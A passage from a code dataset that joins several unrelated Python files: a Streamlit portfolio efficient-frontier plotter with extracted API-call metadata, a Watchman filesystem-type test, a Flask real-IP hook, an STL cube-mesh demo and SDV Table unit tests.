self.min_vol_portf = self.portf_results_df.loc[self.min_vol_ind]
st.header("- - - Maximum Sharpe Ratio portfolio - - -")
st.subheader("Performance:")
for index, value in self.max_sharpe_portf.items():
st.write(f"{index}: {100 * value:.2f}% ", end="", flush=True)
st.subheader("\nWeights")
for x, y in zip(
self.RISKY_ASSETS,
self.weights[np.argmax(self.portf_results_df.sharpe_ratio)],
):
st.write(f"{x}: {100*y:.2f}% ", end="", flush=True)
def results_minVolatility(self):
self.results_maxSharpeRatio()
st.header("- - - Minimum Volatility portfolio - - -")
st.subheader("Performance:")
for index, value in self.min_vol_portf.items():
st.write(f"{index}: {100 * value:.2f}% ", end="", flush=True)
st.subheader("\nWeights")
for x, y in zip(
self.RISKY_ASSETS, self.weights[np.argmin(self.portf_results_df.volatility)]
):
st.write(f"{x}: {100*y:.2f}% ", end="", flush=True)
def final_plot(self):
self.results_minVolatility()
fig, ax = plt.subplots()
self.portf_results_df.plot(
kind="scatter",
x="volatility",
y="returns",
c="sharpe_ratio",
cmap="RdYlGn",
edgecolors="black",
ax=ax,
)
ax.scatter(
x=self.max_sharpe_portf.volatility,
y=self.max_sharpe_portf.returns,
c="black",
marker="X",
s=175,
label="Max Sharpe Ratio",
)
ax.scatter(
x=self.min_vol_portf.volatility,
y=self.min_vol_portf.returns,
c="black",
marker="P",
s=175,
label="Min Volatility",
)
self.portf_results_df.plot(
kind="scatter",
x="volatility",
y="returns",
c="sharpe_ratio",
cmap="RdYlGn",
edgecolors="black",
ax=ax,
)
ax.set(
xlabel="Volatility", ylabel="Expected Returns", title="Efficient Frontier"
)
ax.plot(self.portf_vol_ef, self.portf_rtns_ef, "b--")
for asset_index in range(self.n_assets):
ax.scatter(
x=np.sqrt(self.cov_mat.iloc[asset_index, asset_index]),
y=self.avg_returns[asset_index],
# marker=self.MARKS[asset_index],
s=100,
color="black",
label=self.RISKY_ASSETS[asset_index],
)
ax.set(
xlabel="Volatility",
ylabel="Expected Returns",
title=f"Efficient Frontier", # {self.string}",
)
for label in ax.get_xticklabels() + ax.get_yticklabels():
label.set_fontsize(15)
ax.grid(True, color="k", linestyle="-", linewidth=1, alpha=0.3)
ax.legend(loc="best", prop={"size": 16})
plt.tight_layout()
st.pyplot(fig)
# * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
# * * * * * * * * * * * * * * * * * * * * *
# * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
if __name__ == "__main__":
RISKY_ASSETS = []
manys = [2, 4, 6, 8, 10, 12, 14]
how_many = int(
st.sidebar.selectbox("Select Number Of Securities For Portfolio:", manys)
)
# how_many = int(input('How Many Stocks In Your Portfolio? (up to 14): '))
for i in range(1, how_many + 1):
tic = input(f"Enter Stock {i}: ")
RISKY_ASSETS.append(tic)
RISKY_ASSETS.sort()
marks0 = ["o", "^", "s", "p", "h", "8", "*", "d", ">", "v", "<", "1", "2", "3", "4"]
mark = marks0[: len(RISKY_ASSETS) + 1]
The_Efficient_Frontier(RISKY_ASSETS).final_plot()
# * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
# * * * * * * * * * * * * * * * * * * * * *
# * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
|
[
"numpy.random.seed",
"numpy.sum",
"numpy.argmax",
"numpy.argmin",
"matplotlib.pyplot.style.use",
"streamlit.sidebar.selectbox",
"numpy.round",
"matplotlib.pyplot.tight_layout",
"pandas.DataFrame",
"streamlit.subheader",
"yfinance.download",
"matplotlib.pyplot.rc",
"matplotlib.pyplot.subplots",
"datetime.datetime.now",
"streamlit.header",
"numpy.min",
"matplotlib.use",
"streamlit.pyplot",
"numpy.dot",
"seaborn.set_palette",
"numpy.delete",
"warnings.filterwarnings",
"streamlit.write",
"numpy.random.random",
"numpy.array",
"numpy.where",
"pathlib.Path.cwd",
"numpy.sqrt"
] |
[((17, 50), 'warnings.filterwarnings', 'warnings.filterwarnings', (['"""ignore"""'], {}), "('ignore')\n", (40, 50), False, 'import warnings\n'), ((157, 178), 'matplotlib.use', 'matplotlib.use', (['"""Agg"""'], {}), "('Agg')\n", (171, 178), False, 'import matplotlib\n'), ((246, 269), 'matplotlib.pyplot.style.use', 'plt.style.use', (['"""ggplot"""'], {}), "('ggplot')\n", (259, 269), True, 'from matplotlib import pyplot as plt\n'), ((293, 317), 'matplotlib.pyplot.style.use', 'plt.style.use', (['"""seaborn"""'], {}), "('seaborn')\n", (306, 317), True, 'from matplotlib import pyplot as plt\n'), ((318, 346), 'seaborn.set_palette', 'sns.set_palette', (['"""cubehelix"""'], {}), "('cubehelix')\n", (333, 346), True, 'import seaborn as sns\n'), ((448, 471), 'matplotlib.pyplot.rc', 'plt.rc', (['"""font"""'], {'size': 'sm'}), "('font', size=sm)\n", (454, 471), True, 'from matplotlib import pyplot as plt\n'), ((503, 532), 'matplotlib.pyplot.rc', 'plt.rc', (['"""axes"""'], {'titlesize': 'med'}), "('axes', titlesize=med)\n", (509, 532), True, 'from matplotlib import pyplot as plt\n'), ((563, 592), 'matplotlib.pyplot.rc', 'plt.rc', (['"""axes"""'], {'labelsize': 'med'}), "('axes', labelsize=med)\n", (569, 592), True, 'from matplotlib import pyplot as plt\n'), ((625, 654), 'matplotlib.pyplot.rc', 'plt.rc', (['"""xtick"""'], {'labelsize': 'sm'}), "('xtick', labelsize=sm)\n", (631, 654), True, 'from matplotlib import pyplot as plt\n'), ((686, 715), 'matplotlib.pyplot.rc', 'plt.rc', (['"""ytick"""'], {'labelsize': 'sm'}), "('ytick', labelsize=sm)\n", (692, 715), True, 'from matplotlib import pyplot as plt\n'), ((747, 776), 'matplotlib.pyplot.rc', 'plt.rc', (['"""legend"""'], {'fontsize': 'sm'}), "('legend', fontsize=sm)\n", (753, 776), True, 'from matplotlib import pyplot as plt\n'), ((796, 826), 'matplotlib.pyplot.rc', 'plt.rc', (['"""figure"""'], {'titlesize': 'lg'}), "('figure', titlesize=lg)\n", (802, 826), True, 'from matplotlib import pyplot as plt\n'), ((859, 886), 'matplotlib.pyplot.rc', 'plt.rc', (['"""axes"""'], {'linewidth': '(2)'}), "('axes', linewidth=2)\n", (865, 886), True, 'from matplotlib import pyplot as plt\n'), ((976, 986), 'pathlib.Path.cwd', 'Path.cwd', ([], {}), '()\n', (984, 986), False, 'from pathlib import Path\n'), ((1037, 1051), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (1049, 1051), False, 'from datetime import datetime\n'), ((2110, 2128), 'numpy.random.seed', 'np.random.seed', (['(42)'], {}), '(42)\n', (2124, 2128), True, 'import numpy as np\n'), ((2152, 2209), 'numpy.random.random', 'np.random.random', ([], {'size': '(self.N_PORTFOLIOS, self.n_assets)'}), '(size=(self.N_PORTFOLIOS, self.n_assets))\n', (2168, 2209), True, 'import numpy as np\n'), ((2343, 2381), 'numpy.dot', 'np.dot', (['self.weights', 'self.avg_returns'], {}), '(self.weights, self.avg_returns)\n', (2349, 2381), True, 'import numpy as np\n'), ((2658, 2682), 'numpy.array', 'np.array', (['self.portf_vol'], {}), '(self.portf_vol)\n', (2666, 2682), True, 'import numpy as np\n'), ((2830, 2947), 'pandas.DataFrame', 'pd.DataFrame', (["{'returns': self.portf_rtns, 'volatility': self.portf_vol, 'sharpe_ratio':\n self.portf_sharpe_ratio}"], {}), "({'returns': self.portf_rtns, 'volatility': self.portf_vol,\n 'sharpe_ratio': self.portf_sharpe_ratio})\n", (2842, 2947), True, 'import pandas as pd\n'), ((3381, 3412), 'numpy.round', 'np.round', (['self.portf_rtns_ef', '(2)'], {}), '(self.portf_rtns_ef, 2)\n', (3389, 3412), True, 'import numpy as np\n'), ((3439, 3467), 'numpy.round', 'np.round', (['self.portf_rtns', '(2)'], {}), '(self.portf_rtns, 2)\n', (3447, 3467), True, 'import numpy as np\n'), ((3900, 3951), 'numpy.delete', 'np.delete', (['self.portf_rtns_ef', 'self.indices_to_skip'], {}), '(self.portf_rtns_ef, self.indices_to_skip)\n', (3909, 3951), True, 'import numpy as np\n'), ((4045, 4090), 'numpy.argmax', 'np.argmax', (['self.portf_results_df.sharpe_ratio'], {}), '(self.portf_results_df.sharpe_ratio)\n', (4054, 4090), True, 'import numpy as np\n'), ((4197, 4240), 'numpy.argmin', 'np.argmin', (['self.portf_results_df.volatility'], {}), '(self.portf_results_df.volatility)\n', (4206, 4240), True, 'import numpy as np\n'), ((4322, 4377), 'streamlit.header', 'st.header', (['"""- - - Maximum Sharpe Ratio portfolio - - -"""'], {}), "('- - - Maximum Sharpe Ratio portfolio - - -')\n", (4331, 4377), True, 'import streamlit as st\n'), ((4386, 4414), 'streamlit.subheader', 'st.subheader', (['"""Performance:"""'], {}), "('Performance:')\n", (4398, 4414), True, 'import streamlit as st\n'), ((4556, 4581), 'streamlit.subheader', 'st.subheader', (['"""\nWeights"""'], {}), "('\\nWeights')\n", (4568, 4581), True, 'import streamlit as st\n'), ((4870, 4923), 'streamlit.header', 'st.header', (['"""- - - Minimum Volatility portfolio - - -"""'], {}), "('- - - Minimum Volatility portfolio - - -')\n", (4879, 4923), True, 'import streamlit as st\n'), ((4932, 4960), 'streamlit.subheader', 'st.subheader', (['"""Performance:"""'], {}), "('Performance:')\n", (4944, 4960), True, 'import streamlit as st\n'), ((5099, 5124), 'streamlit.subheader', 'st.subheader', (['"""\nWeights"""'], {}), "('\\nWeights')\n", (5111, 5124), True, 'import streamlit as st\n'), ((5396, 5410), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (5408, 5410), True, 'from matplotlib import pyplot as plt\n'), ((7256, 7274), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (7272, 7274), True, 'from matplotlib import pyplot as plt\n'), ((7283, 7297), 'streamlit.pyplot', 'st.pyplot', (['fig'], {}), '(fig)\n', (7292, 7297), True, 'import streamlit as st\n'), ((7789, 7862), 'streamlit.sidebar.selectbox', 'st.sidebar.selectbox', (['"""Select Number Of Securities For Portfolio:"""', 'manys'], {}), "('Select Number Of Securities For Portfolio:', manys)\n", (7809, 7862), True, 'import streamlit as st\n'), ((1576, 1626), 'yfinance.download', 'yf.download', (['self.RISKY_ASSETS'], {'start': '"""2020-01-01"""'}), "(self.RISKY_ASSETS, start='2020-01-01')\n", (1587, 1626), True, 'import yfinance as yf\n'), ((2234, 2262), 'numpy.sum', 'np.sum', (['self.weights'], {'axis': '(1)'}), '(self.weights, axis=1)\n', (2240, 2262), True, 'import numpy as np\n'), ((3701, 3761), 'numpy.where', 'np.where', (['(self.portf_rtns == self.portf_rtns_ef[point_index])'], {}), '(self.portf_rtns == self.portf_rtns_ef[point_index])\n', (3709, 3761), True, 'import numpy as np\n'), ((4486, 4547), 'streamlit.write', 'st.write', (['f"""{index}: {100 * value:.2f}% """'], {'end': '""""""', 'flush': '(True)'}), "(f'{index}: {100 * value:.2f}% ', end='', flush=True)\n", (4494, 4547), True, 'import streamlit as st\n'), ((4734, 4787), 'streamlit.write', 'st.write', (['f"""{x}: {100 * y:.2f}% """'], {'end': '""""""', 'flush': '(True)'}), "(f'{x}: {100 * y:.2f}% ', end='', flush=True)\n", (4742, 4787), True, 'import streamlit as st\n'), ((5029, 5090), 'streamlit.write', 'st.write', (['f"""{index}: {100 * value:.2f}% """'], {'end': '""""""', 'flush': '(True)'}), "(f'{index}: {100 * value:.2f}% ', end='', flush=True)\n", (5037, 5090), True, 'import streamlit as st\n'), ((5262, 5315), 'streamlit.write', 'st.write', (['f"""{x}: {100 * y:.2f}% """'], {'end': '""""""', 'flush': '(True)'}), "(f'{x}: {100 * y:.2f}% ', end='', flush=True)\n", (5270, 5315), True, 'import streamlit as st\n'), ((3829, 3869), 'numpy.min', 'np.min', (['self.portf_vol[self.matched_ind]'], {}), '(self.portf_vol[self.matched_ind])\n', (3835, 3869), True, 'import numpy as np\n'), ((4663, 4708), 'numpy.argmax', 'np.argmax', (['self.portf_results_df.sharpe_ratio'], {}), '(self.portf_results_df.sharpe_ratio)\n', (4672, 4708), True, 'import numpy as np\n'), ((5194, 5237), 'numpy.argmin', 'np.argmin', (['self.portf_results_df.volatility'], {}), '(self.portf_results_df.volatility)\n', (5203, 5237), True, 'import numpy as np\n'), ((6593, 6645), 'numpy.sqrt', 'np.sqrt', (['self.cov_mat.iloc[asset_index, asset_index]'], {}), '(self.cov_mat.iloc[asset_index, asset_index])\n', (6600, 6645), True, 'import numpy as np\n'), ((2562, 2599), 'numpy.dot', 'np.dot', (['self.cov_mat', 'self.weights[i]'], {}), '(self.cov_mat, self.weights[i])\n', (2568, 2599), True, 'import numpy as np\n')]
|
# vim:ts=4:sw=4:et:
# Copyright 2014-present Facebook, Inc.
# Licensed under the Apache License, Version 2.0
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# no unicode literals
import pywatchman
import WatchmanInstance
import WatchmanTestCase
@WatchmanTestCase.expand_matrix
class TestIllegalFSType(WatchmanTestCase.WatchmanTestCase):
def test_Illegal(self):
config = {
'illegal_fstypes': [
# This should include any/all fs types. If this test fails on
# your platform, look in /tmp/watchman-test.log for a line like:
# "path /var/tmp/a3osdzvzqnco0sok is on filesystem type zfs"
# then add the type name to this list, in sorted order
'NTFS',
'cifs',
'hfs',
'nfs',
'smb',
'tmpfs',
'ufs',
'unknown',
'zfs',
],
'illegal_fstypes_advice': 'just cos',
}
inst = WatchmanInstance.Instance(config=config)
try:
inst.start()
client = self.getClient(inst)
d = self.mkdtemp()
with self.assertRaises(pywatchman.WatchmanError) as ctx:
client.query('watch', d)
self.assertIn(
(
'filesystem and is disallowed by global config' +
' illegal_fstypes: just cos'
), str(ctx.exception)
)
finally:
inst.stop()
|
[
"WatchmanInstance.Instance"
] |
[((1095, 1135), 'WatchmanInstance.Instance', 'WatchmanInstance.Instance', ([], {'config': 'config'}), '(config=config)\n', (1120, 1135), False, 'import WatchmanInstance\n')]
|
# !/usr/bin/env python
# coding: utf-8
from flask import request, g, make_response
from flask_helper.flask_hook import FlaskHook
from flask_helper.utils.ip import ip_value_str
__author__ = 'zhouhenglc'
class RealIPHook(FlaskHook):
def __init__(self, app, trust_proxy=None,
forwarded_key="X-Forwarded-For"):
FlaskHook.__init__(self, app)
if trust_proxy is None:
trust_proxy = []
self.trust_proxy = list(trust_proxy)
self.forwarded_key = forwarded_key
def before_request(self):
request_ip = request.remote_addr
if self.forwarded_key in request.headers \
and request_ip in self.trust_proxy:
l_ip = request.headers[self.forwarded_key].split(",")
request_ip = l_ip[0]
if isinstance(self.trust_proxy, list):
for i in range(len(l_ip) - 1, -1, -1):
one_proxy = l_ip[i].strip()
if one_proxy not in self.trust_proxy:
request_ip = one_proxy
break
g.remote_addr = request_ip
g.ip_value = ip_value_str(ip_str=request_ip)
if g.ip_value == 0:
return make_response("IP受限", 403)
|
[
"flask.make_response",
"flask_helper.utils.ip.ip_value_str",
"flask_helper.flask_hook.FlaskHook.__init__"
] |
[((341, 370), 'flask_helper.flask_hook.FlaskHook.__init__', 'FlaskHook.__init__', (['self', 'app'], {}), '(self, app)\n', (359, 370), False, 'from flask_helper.flask_hook import FlaskHook\n'), ((1139, 1170), 'flask_helper.utils.ip.ip_value_str', 'ip_value_str', ([], {'ip_str': 'request_ip'}), '(ip_str=request_ip)\n', (1151, 1170), False, 'from flask_helper.utils.ip import ip_value_str\n'), ((1218, 1244), 'flask.make_response', 'make_response', (['"""IP受限"""', '(403)'], {}), "('IP受限', 403)\n", (1231, 1244), False, 'from flask import request, g, make_response\n')]
|
from stl import mesh
import math
import numpy
# Create 3 faces of a cube
data = numpy.zeros(6, dtype=mesh.Mesh.dtype)
# Top of the cube
data['vectors'][0] = numpy.array([[0, 1, 1],
[1, 0, 1],
[0, 0, 1]])
data['vectors'][1] = numpy.array([[1, 0, 1],
[0, 1, 1],
[1, 1, 1]])
# Front face
data['vectors'][2] = numpy.array([[1, 0, 0],
[1, 0, 1],
[1, 1, 0]])
data['vectors'][3] = numpy.array([[1, 1, 1],
[1, 0, 1],
[1, 1, 0]])
# Left face
data['vectors'][4] = numpy.array([[0, 0, 0],
[1, 0, 0],
[1, 0, 1]])
data['vectors'][5] = numpy.array([[0, 0, 0],
[0, 0, 1],
[1, 0, 1]])
# Since the cube faces are from 0 to 1 we can move it to the middle by
# substracting .5
data['vectors'] -= .5
# Generate 4 different meshes so we can rotate them later
meshes = [mesh.Mesh(data.copy()) for _ in range(4)]
# Rotate 90 degrees over the Y axis
meshes[0].rotate([0.0, 0.5, 0.0], math.radians(90))
# Translate 2 points over the X axis
meshes[1].x += 2
# Rotate 90 degrees over the X axis
meshes[2].rotate([0.5, 0.0, 0.0], math.radians(90))
# Translate 2 points over the X and Y points
meshes[2].x += 2
meshes[2].y += 2
# Rotate 90 degrees over the X and Y axis
meshes[3].rotate([0.5, 0.0, 0.0], math.radians(90))
meshes[3].rotate([0.0, 0.5, 0.0], math.radians(90))
# Translate 2 points over the Y axis
meshes[3].y += 2
# Optionally render the rotated cube faces
from matplotlib import pyplot
from mpl_toolkits import mplot3d
# Create a new plot
figure = pyplot.figure()
axes = mplot3d.Axes3D(figure)
# Render the cube faces
for m in meshes:
axes.add_collection3d(mplot3d.art3d.Poly3DCollection(m.vectors))
# Auto scale to the mesh size
scale = numpy.concatenate([m.points for m in meshes]).flatten(-1)
axes.auto_scale_xyz(scale, scale, scale)
# Show the plot to the screen
pyplot.show()
|
[
"matplotlib.pyplot.show",
"mpl_toolkits.mplot3d.Axes3D",
"math.radians",
"numpy.zeros",
"mpl_toolkits.mplot3d.art3d.Poly3DCollection",
"matplotlib.pyplot.figure",
"numpy.array",
"numpy.concatenate"
] |
[((81, 118), 'numpy.zeros', 'numpy.zeros', (['(6)'], {'dtype': 'mesh.Mesh.dtype'}), '(6, dtype=mesh.Mesh.dtype)\n', (92, 118), False, 'import numpy\n'), ((159, 205), 'numpy.array', 'numpy.array', (['[[0, 1, 1], [1, 0, 1], [0, 0, 1]]'], {}), '([[0, 1, 1], [1, 0, 1], [0, 0, 1]])\n', (170, 205), False, 'import numpy\n'), ((295, 341), 'numpy.array', 'numpy.array', (['[[1, 0, 1], [0, 1, 1], [1, 1, 1]]'], {}), '([[1, 0, 1], [0, 1, 1], [1, 1, 1]])\n', (306, 341), False, 'import numpy\n'), ((444, 490), 'numpy.array', 'numpy.array', (['[[1, 0, 0], [1, 0, 1], [1, 1, 0]]'], {}), '([[1, 0, 0], [1, 0, 1], [1, 1, 0]])\n', (455, 490), False, 'import numpy\n'), ((580, 626), 'numpy.array', 'numpy.array', (['[[1, 1, 1], [1, 0, 1], [1, 1, 0]]'], {}), '([[1, 1, 1], [1, 0, 1], [1, 1, 0]])\n', (591, 626), False, 'import numpy\n'), ((728, 774), 'numpy.array', 'numpy.array', (['[[0, 0, 0], [1, 0, 0], [1, 0, 1]]'], {}), '([[0, 0, 0], [1, 0, 0], [1, 0, 1]])\n', (739, 774), False, 'import numpy\n'), ((864, 910), 'numpy.array', 'numpy.array', (['[[0, 0, 0], [0, 0, 1], [1, 0, 1]]'], {}), '([[0, 0, 0], [0, 0, 1], [1, 0, 1]])\n', (875, 910), False, 'import numpy\n'), ((1853, 1868), 'matplotlib.pyplot.figure', 'pyplot.figure', ([], {}), '()\n', (1866, 1868), False, 'from matplotlib import pyplot\n'), ((1876, 1898), 'mpl_toolkits.mplot3d.Axes3D', 'mplot3d.Axes3D', (['figure'], {}), '(figure)\n', (1890, 1898), False, 'from mpl_toolkits import mplot3d\n'), ((2179, 2192), 'matplotlib.pyplot.show', 'pyplot.show', ([], {}), '()\n', (2190, 2192), False, 'from matplotlib import pyplot\n'), ((1273, 1289), 'math.radians', 'math.radians', (['(90)'], {}), '(90)\n', (1285, 1289), False, 'import math\n'), ((1417, 1433), 'math.radians', 'math.radians', (['(90)'], {}), '(90)\n', (1429, 1433), False, 'import math\n'), ((1591, 1607), 'math.radians', 'math.radians', (['(90)'], {}), '(90)\n', (1603, 1607), False, 'import math\n'), ((1643, 1659), 'math.radians', 'math.radians', (['(90)'], {}), '(90)\n', (1655, 1659), False, 'import math\n'), ((1967, 2008), 'mpl_toolkits.mplot3d.art3d.Poly3DCollection', 'mplot3d.art3d.Poly3DCollection', (['m.vectors'], {}), '(m.vectors)\n', (1997, 2008), False, 'from mpl_toolkits import mplot3d\n'), ((2049, 2094), 'numpy.concatenate', 'numpy.concatenate', (['[m.points for m in meshes]'], {}), '([m.points for m in meshes])\n', (2066, 2094), False, 'import numpy\n')]
|
from unittest.mock import Mock, patch
import pandas as pd
import pytest
from rdt.transformers.numerical import NumericalTransformer
from sdv.constraints.base import Constraint
from sdv.constraints.errors import MissingConstraintColumnError
from sdv.errors import ConstraintsNotMetError
from sdv.metadata import Table
class TestTable:
@patch.object(Constraint, 'from_dict')
def test__prepare_constraints_sorts_constraints(self, from_dict_mock):
"""Test that ``_prepare_constraints`` method sorts constraints.
The ``_prepare_constraints`` method should sort constraints by putting
constraints with ``rebuild_columns`` before the ones without them.
Input:
- list of constraints with some having ``rebuild_columns``
before constraints without them.
Output:
- List of constraints sorted properly.
"""
# Setup
constraint1 = Constraint(handling_strategy='transform')
constraint2 = Constraint(handling_strategy='transform')
constraint3 = Constraint(handling_strategy='reject_sampling')
constraints = [constraint1, constraint2, constraint3]
constraint1.rebuild_columns = ['a']
constraint2.rebuild_columns = ['b']
constraint3.rebuild_columns = []
from_dict_mock.side_effect = [constraint1, constraint2, constraint3]
# Run
sorted_constraints = Table._prepare_constraints(constraints)
# Asserts
assert sorted_constraints == [constraint3, constraint1, constraint2]
@patch.object(Constraint, 'from_dict')
def test__prepare_constraints_sorts_constraints_none_rebuild_columns(self, from_dict_mock):
"""Test that ``_prepare_constraints`` method sorts constraints.
The ``_prepare_constraints`` method should sort constraints with None as
``rebuild_columns`` before those that have them.
Input:
- list of constraints with some having None as ``rebuild_columns``
listed after those with ``rebuild_columns``.
Output:
- List of constraints sorted properly.
"""
# Setup
constraint1 = Constraint(handling_strategy='transform')
constraint2 = Constraint(handling_strategy='transform')
constraint3 = Constraint(handling_strategy='reject_sampling')
constraints = [constraint1, constraint2, constraint3]
constraint1.rebuild_columns = ['a']
constraint2.rebuild_columns = ['b']
constraint3.rebuild_columns = None
from_dict_mock.side_effect = [constraint1, constraint2, constraint3]
# Run
sorted_constraints = Table._prepare_constraints(constraints)
# Asserts
assert sorted_constraints == [constraint3, constraint1, constraint2]
@patch.object(Constraint, 'from_dict')
def test__prepare_constraints_validates_constraint_order(self, from_dict_mock):
"""Test the ``_prepare_constraints`` method validates the constraint order.
If no constraint has ``rebuild_columns`` that are in a later
constraint's ``constraint_columns``, no exception should be raised.
Input:
- List of constraints with none having ``rebuild_columns``
that are in a later constraint's ``constraint_columns``.
Output:
- Sorted list of constraints.
"""
# Setup
constraint1 = Constraint(handling_strategy='reject_sampling')
constraint2 = Constraint(handling_strategy='reject_sampling')
constraint3 = Constraint(handling_strategy='transform')
constraint4 = Constraint(handling_strategy='transform')
constraints = [constraint1, constraint2, constraint3, constraint4]
constraint3.rebuild_columns = ['e', 'd']
constraint4.constraint_columns = ['a', 'b', 'c']
constraint4.rebuild_columns = ['a']
from_dict_mock.side_effect = [constraint1, constraint2, constraint3, constraint4]
# Run
sorted_constraints = Table._prepare_constraints(constraints)
# Assert
assert sorted_constraints == constraints
@patch.object(Constraint, 'from_dict')
def test__prepare_constraints_invalid_order_raises_exception(self, from_dict_mock):
"""Test the ``_prepare_constraints`` method validates the constraint order.
If one constraint has ``rebuild_columns`` that are in a later
constraint's ``constraint_columns``, an exception should be raised.
Input:
- List of constraints with some having ``rebuild_columns``
that are in a later constraint's ``constraint_columns``.
Side Effect:
- Exception should be raised.
"""
# Setup
constraint1 = Constraint(handling_strategy='reject_sampling')
constraint2 = Constraint(handling_strategy='reject_sampling')
constraint3 = Constraint(handling_strategy='transform')
constraint4 = Constraint(handling_strategy='transform')
constraints = [constraint1, constraint2, constraint3, constraint4]
constraint3.rebuild_columns = ['a', 'd']
constraint4.constraint_columns = ['a', 'b', 'c']
constraint4.rebuild_columns = ['a']
from_dict_mock.side_effect = [constraint1, constraint2, constraint3, constraint4]
# Run
with pytest.raises(Exception):
Table._prepare_constraints(constraints)
@patch('sdv.metadata.table.rdt.transformers.NumericalTransformer',
spec_set=NumericalTransformer)
def test___init__(self, transformer_mock):
"""Test that ``__init__`` method passes parameters.
The ``__init__`` method should pass the custom parameters
to the ``NumericalTransformer``.
Input:
- rounding set to an int
- max_value set to an int
- min_value set to an int
Side Effects:
- ``NumericalTransformer`` should receive the correct parameters
"""
# Run
Table(rounding=-1, max_value=100, min_value=-50)
# Asserts
assert len(transformer_mock.mock_calls) == 2
transformer_mock.assert_any_call(
dtype=int, rounding=-1, max_value=100, min_value=-50)
transformer_mock.assert_any_call(
dtype=float, rounding=-1, max_value=100, min_value=-50)
@patch.object(Table, '_prepare_constraints')
def test___init__calls_prepare_constraints(self, _prepare_constraints_mock):
"""Test that ``__init__`` method calls ``_prepare_constraints"""
# Run
Table(constraints=[])
# Assert
_prepare_constraints_mock.called_once_with([])
def test__make_ids(self):
"""Test whether regex is correctly generating expressions."""
metadata = {'subtype': 'string', 'regex': '[a-d]'}
keys = Table._make_ids(metadata, 3)
assert (keys == pd.Series(['a', 'b', 'c'])).all()
def test__make_ids_fail(self):
"""Test if regex fails with more requested ids than available unique values."""
metadata = {'subtype': 'string', 'regex': '[a-d]'}
with pytest.raises(ValueError):
Table._make_ids(metadata, 20)
def test__make_ids_unique_field_not_unique(self):
"""Test that id column is replaced with all unique values if not already unique."""
metadata_dict = {
'fields': {
'item 0': {'type': 'id', 'subtype': 'integer'},
'item 1': {'type': 'boolean'}
},
'primary_key': 'item 0'
}
metadata = Table.from_dict(metadata_dict)
data = pd.DataFrame({
'item 0': [0, 1, 1, 2, 3, 5, 5, 6],
'item 1': [True, True, False, False, True, False, False, True]
})
new_data = metadata.make_ids_unique(data)
assert new_data['item 1'].equals(data['item 1'])
assert new_data['item 0'].is_unique
def test__make_ids_unique_field_already_unique(self):
"""Test that id column is kept if already unique."""
metadata_dict = {
'fields': {
'item 0': {'type': 'id', 'subtype': 'integer'},
'item 1': {'type': 'boolean'}
},
'primary_key': 'item 0'
}
metadata = Table.from_dict(metadata_dict)
data = pd.DataFrame({
'item 0': [9, 1, 8, 2, 3, 7, 5, 6],
'item 1': [True, True, False, False, True, False, False, True]
})
new_data = metadata.make_ids_unique(data)
assert new_data['item 1'].equals(data['item 1'])
assert new_data['item 0'].equals(data['item 0'])
def test__make_ids_unique_field_index_out_of_order(self):
"""Test that updated id column is unique even if index is out of order."""
metadata_dict = {
'fields': {
'item 0': {'type': 'id', 'subtype': 'integer'},
'item 1': {'type': 'boolean'}
},
'primary_key': 'item 0'
}
metadata = Table.from_dict(metadata_dict)
data = pd.DataFrame({
'item 0': [0, 1, 1, 2, 3, 5, 5, 6],
'item 1': [True, True, False, False, True, False, False, True]
}, index=[0, 1, 1, 2, 3, 5, 5, 6])
new_data = metadata.make_ids_unique(data)
assert new_data['item 1'].equals(data['item 1'])
assert new_data['item 0'].is_unique
def test_transform_calls__transform_constraints(self):
"""Test that the `transform` method calls `_transform_constraints` with right parameters
The ``transform`` method is expected to call the ``_transform_constraints`` method
with the data and correct value for ``on_missing_column``.
Input:
- Table data
Side Effects:
- Calls _transform_constraints
"""
# Setup
data = pd.DataFrame({
'item 0': [0, 1, 2],
'item 1': [True, True, False]
}, index=[0, 1, 2])
dtypes = {'item 0': 'int', 'item 1': 'bool'}
table_mock = Mock()
table_mock.get_dtypes.return_value = dtypes
table_mock._transform_constraints.return_value = data
table_mock._anonymize.return_value = data
table_mock._hyper_transformer.transform.return_value = data
# Run
Table.transform(table_mock, data, 'error')
# Assert
expected_data = pd.DataFrame({
'item 0': [0, 1, 2],
'item 1': [True, True, False]
}, index=[0, 1, 2])
mock_calls = table_mock._transform_constraints.mock_calls
args = mock_calls[0][1]
assert len(mock_calls) == 1
assert args[0].equals(expected_data)
assert args[1] == 'error'
def test__transform_constraints(self):
"""Test that method correctly transforms data based on constraints
The ``_transform_constraints`` method is expected to loop through constraints
and call each constraint's ``transform`` method on the data.
Input:
- Table data
Output:
- Transformed data
"""
# Setup
data = pd.DataFrame({
'item 0': [0, 1, 2],
'item 1': [3, 4, 5]
}, index=[0, 1, 2])
transformed_data = pd.DataFrame({
'item 0': [0, 0.5, 1],
'item 1': [6, 8, 10]
}, index=[0, 1, 2])
first_constraint_mock = Mock()
second_constraint_mock = Mock()
first_constraint_mock.transform.return_value = transformed_data
second_constraint_mock.return_value = transformed_data
table_mock = Mock()
table_mock._constraints = [first_constraint_mock, second_constraint_mock]
# Run
result = Table._transform_constraints(table_mock, data)
# Assert
assert result.equals(transformed_data)
first_constraint_mock.transform.assert_called_once_with(data)
second_constraint_mock.transform.assert_called_once_with(transformed_data)
def test__transform_constraints_raises_error(self):
"""Test that method raises error when specified.
The ``_transform_constraints`` method is expected to raise ``MissingConstraintColumnError``
if the constraint transform raises one and ``on_missing_column`` is set to error.
Input:
- Table data
Side Effects:
- MissingConstraintColumnError
"""
# Setup
data = pd.DataFrame({
'item 0': [0, 1, 2],
'item 1': [3, 4, 5]
}, index=[0, 1, 2])
constraint_mock = Mock()
constraint_mock.transform.side_effect = MissingConstraintColumnError
table_mock = Mock()
table_mock._constraints = [constraint_mock]
# Run/Assert
with pytest.raises(MissingConstraintColumnError):
Table._transform_constraints(table_mock, data, 'error')
def test__transform_constraints_drops_columns(self):
"""Test that method drops columns when specified.
